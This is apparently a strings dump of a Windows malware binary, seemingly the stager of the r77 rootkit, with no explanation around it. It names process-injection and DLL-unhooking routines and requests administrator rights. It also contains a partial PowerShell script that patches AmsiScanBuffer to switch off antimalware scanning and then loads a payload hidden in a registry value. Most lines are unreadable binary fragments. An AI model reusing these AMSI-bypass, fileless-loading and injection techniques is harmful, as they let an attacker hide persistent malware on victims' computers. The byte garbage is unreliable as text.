!This program cannot be run in DOS mode.
CqaiCpa
CRichqa
`.rdata
@.rsrc
@.reloc
t>h 7@
ntdll.dll
RtlGetVersion
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
StrCpyW
StrCatW
StrStrIW
StrNCatW
SHLWAPI.dll
HeapFree
lstrlenW
HeapAlloc
GetProcessHeap
GetCurrentProcess
SizeofResource
FindResourceA
GetModuleHandleA
LockResource
LoadResource
GetProcAddress
IsWow64Process
ExitProcess
KERNEL32.dll
RegOpenKeyExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
RegSetValueExW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
!This program cannot be run in DOS mode.
`.reloc
(ZjX(
v2.0.50727
#Strings
<>9__2_0
<GetExecutableFunction>b__2_0
IEnumerable`1
get_Service32
get_Dll32
Microsoft.Win32
ReadInt32
ToInt32
Func`2
get_Service64
get_Dll64
ReadInt16
ToInt16
<Module>
CreateFileA
MODULEINFO
System.IO
mscorlib
System.Collections.Generic
get_Id
processId
thread
inCreateSuspended
shareMode
EnterDebugMode
CompressionMode
SizeOfImage
Enumerable
IDisposable
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
inheritHandle
handle
templateFile
MapViewOfFile
module
fileName
moduleName
ControlPipeName
functionName
GetProcessesByName
LocalMachine
ValueType
allocationType
System.Core
R77ServiceSignature
R77HelperSignature
get_Culture
set_Culture
resourceCulture
Dispose
EditorBrowsableState
CompilerGeneratedAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
SecurityPermissionAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
ReadByte
SetValue
Stager.exe
get_Size
maximumStackSize
CreateFileMapping
String
maximumSizeHigh
fileOffsetHigh
get_Length
sizeOfStack
Unhook
Global
Marshal
System.ComponentModel
BaseOfDll
UnhookDll
InjectDll
kernel32.dll
psapi.dll
ntdll.dll
msvcrt.dll
GZipStream
CopyStream
MemoryStream
stream
Program
OperatingSystem
resourceMan
numberOfBytesWritten
get_OSVersion
get_Version
System.IO.Compression
GetModuleInformation
destination
System.Globalization
SecurityAction
System.Reflection
GetExecutableFunction
creationDisposition
Exception
moduleInfo
CultureInfo
numberOfBytesToMap
System.Linq
Buffer
buffer
get_ResourceManager
Stager
System.CodeDom.Compiler
Helper
parameter
BitConverter
get_Major
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Stager.Properties.Resources.resources
DebuggingModes
Stager.Properties
flagsAndAttributes
fileMappingAttributes
objectAttributes
securityAttributes
Contains
System.Security.Permissions
desiredAccess
access
OpenProcess
GetCurrentProcess
process
baseAddress
startAddress
address
Decompress
stackZeroBits
Concat
fileMappingObject
GetObject
Inject
Select
oldProtect
VirtualProtect
newProtect
protect
RvaToOffset
IsExecutable64Bit
op_Explicit
Environment
EntryPoint
Decrypt
attributeList
R77Const
maximumSizeLow
fileOffsetLow
VirtualAllocEx
NtCreateThreadEx
HidePrefix
ToArray
OpenSubKey
RegistryKey
get_Assembly
memcpy
BlockCopy
FreeLibrary
WriteProcessMemory
Registry
op_Equality
op_Inequality
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
)|dH#mnna
9VENIPT=
)$/;Sz
JzoJNd
tOj7]bS6
Pi,5x|H
g=khuau
=_IN_L
1"g\[B
e(I[Cc
BcSLy`?
L<ga]Z
j18-4l
rPU*YA
~evzv6}
W=@9<l
d!d"q|#W:,
/"3nk>JGGk
>W%fDa
w%0%#s
U<8G%q
Gl{bS_R,FO
Bg]SIB
j:<(s4
aL^lw5
z_@CrHr
$*!(:p`
7ID)Q<
rjSk=$
&)C,nd
ZJy`Hs
&\|aE~H
,3C|n2
G,4(:br
qE6BGKDh;|
"h4FRC
*2A=U{w
QbmX 906P]
O,`=B$
a(kLW"
gL'l<@
97xS5Jg
k?yB/}
Z(e&!=\F
H !^IK)+mIK-
#\`[nV
}Og7<
HYf7f!t
+Xs2(K
.V>xs^
^QF.~~XQl
6OdSA=
O6H^Lf
|Lo#(:K4
D-k!se
v/k9rJ
A#~4wB
&-jpts|
x,don'
m0PYAp
$W">~"
BA7S3S
i=89$2Ju-
O2w4j#J
VtS?k->j
j92UMw
nBF'D9O)W{km
=%OS[n[c^
1O`h1G
GEw#~<
gdI<ke
h2e#D4
$bO[O#
Ys:[&\a(
ri>8ug
4zDd5z
WpZB r
&D<BjwBZ
g:)ev.w
I|]G
9(GfYy/
Q\ua#Hs
|bw7(a
4"6kCJ
t(!dL/
$d`Wk[
B\=En?
3`[S\1C
^%Z-oA
w8n<\<
g9XH78
h7M|-@
G|=~D7
WB,f `
[xup6E~
^ a>$Ag(
^|UhEO+o
*1L>@x
cgsR 0
os:*6'^
s1 Z -%
Oo+}C^
+y]J>?
9kGl
a_X1L#,
t!f%z_
M387UK
XW,*t+
!"!n%n
Z9j9dr
h&PK v
hF>C)#
p!0CB%x%
:8U*L;
SH$2`dL
=0bxFq
MRKJ')'
7T"IRI
D>av.U'L
dRTSTR
dR"I.I
|!gH.$
JE)D%O
d)e)f%
H<J,J$j
0v<\&@_
djk<R%
8]i"Dj
SrwY%y>
PZMf$Q
>CV~6YE
^\sJkN
+>pcY]x
Y]Rh:t
?6@[AL] SyN
7&4~L4hI
NL^,y_.<Q
{ t9Ks
7&r}Lvh^
@:2J <2
o@Z}'e@
0ct~XWf
CO"y>C
[sb}CT5
{F?I%de
Dn\M,t3
tk7g*u
Mod_Dx
<#{tt3
\C,4]+`
Fz.'oy
9lNT5ux#d
38.uwE
e-I/cIzf
gjIzi+
{T57PXfZ
V{u[ zw
Or9t[F:
E~nd3M
~y\;o?
EK$Sz-
m;U) [}
o`(rC[
v\\D&(/
%Qbrp$
;$c8h3[h
~Pht(&
'p<!,w
gG7'f(
xgmI\AD
6@5o'5
~h2->[
z+IoeN
=q0Z2Nvl
3D4k7$/
JJeRX4
<`3ya \N
!UUA/$
}/$?kH
^UMJSL
F@2D~,
_\ .V:
p?n(*
1Jpe/}
hDp^iF
#PSAV{
,S`O:Ph
S@j/w~
0PbKs
i,\\4WWg
j6C2W&
=[Onfo
k)9wt`
{/co\g(
.z4hTcQO
KzMoqS
}: ]sm ]
W`<HYXU4
5fw=yk
14Ar!U
A^~w%h
sAYOo>-
Y7Pwi@
$N}C]i
#I\A4#&
XXZ%TP
OWkL~t
T(VX-$x)b
<!HZk
xn,v,+
U;53d-
2F8Sw*
x`2uP62+
/6[[po
,po TP
i0@lv5
NGLd#&
WrPwkL
=`k/+1=
Ko:ljW
.sgxgpG
QPTk/
*q,fA<+
VOp4A\
3xP,g+
A1fSi0(&
G2(0YU
50p5CB
K~DY}<h
"[:2D7
EGOPJX
x65+<F^
/|{5XX
"aE\cr
W'TuNz
45rY,
1rv52V
(h%jze
?,R9++
zN(^4c
@N}ob
\ !*KxO$
{S8D{{
sO?cor
9]Ea[QJ
[[d9.P
^U%\mA
2cjb|`oD
n`)jRd
&[&["[$
MeJsNj
.o_Zu^
cBp,0oQ
8E1Tfj
K[I0nI
Mrhr@s!
UFBY"#
uF5Z0w
aA{WH2=^
aoF1YUf
}6,kh7
mD2DyL
Ai?Ij2
,c7f#h
&#!)y2
% ;+HF
>a(HJ
TKRIRL
0' O`M
}=m=U=e=$
pdL|A9
b<eLU"
7<LcFJ
Y1)IlA
?Xfx>E
/$l]H|
C")qY>r
L>q)xI
|jpGqz
~0incl
8=({Kc
f6adcw
H'IN$m+
b5U,\*
o!h%d#
/VVWR&
_CorExeMain
mscoree.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0 0/0;0]0G1N1
2 2:2B2H2Z2O3
4,595I5c5~5
8"808>8{8
9#9,9?9K9Y9h9q9x9
:):5:A:M:Y:e:q:}:
;B;O;U;l;v;
<I<Z<j<
=&=+=4=;=B=I=P=W=^=v=z=~=
Microsoft Base Cryptographic Provider v1.0
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
SYSTEM
ESOFTWARE
$77stager
$77svc32
$77svc64
powershell
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]$ReturnType)$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(`ReflectedDelegate`)),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(`InMemoryModule`,$False).DefineType(`MyDelegateType`,`Class,Public,Sealed,AnsiClass,AutoClass`,[MulticastDelegate]);$TypeBuilder.DefineConstructor(`RTSpecialName,HideBySig,Public`,[Reflection.CallingConventions]::Standard,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);$TypeBuilder.DefineMethod(`Invoke`,`Public,HideBySig,NewSlot,Virtual`,$ReturnType,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);Write-Output $TypeBuilder.CreateType();}$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(`System.dll`)}).GetType(`Microsoft.Win32.UnsafeNativeMethods`);$GetProcAddress=$NativeMethods.GetMet
[Runtime.InteropServices.Marshal]::Copy([Byte[]](
),0,$AmsiScanBufferPtr,
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,0x20,[ref]$OldProtect);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invoke($Null,$Null)
Get-Delegate
ParameterTypes
ReturnType
TypeBuilder
NativeMethods
GetProcAddress
LoadLibraryDelegate
VirtualProtectDelegate
Kernel32Ptr
LoadLibraryPtr
VirtualProtectPtr
AmsiPtr
AmsiScanBufferPtr
OldProtect
'+[Char](
[Byte](
ReflectiveDllMain
ntdll.dll
kernelbase.dll
kernel32.dll
SOFTWARE
$77dll32
$77dll64
winlogon
C:\Windows\System32\
Stager.Properties.Resources
Service32
Service64
$77control
Service32
Service64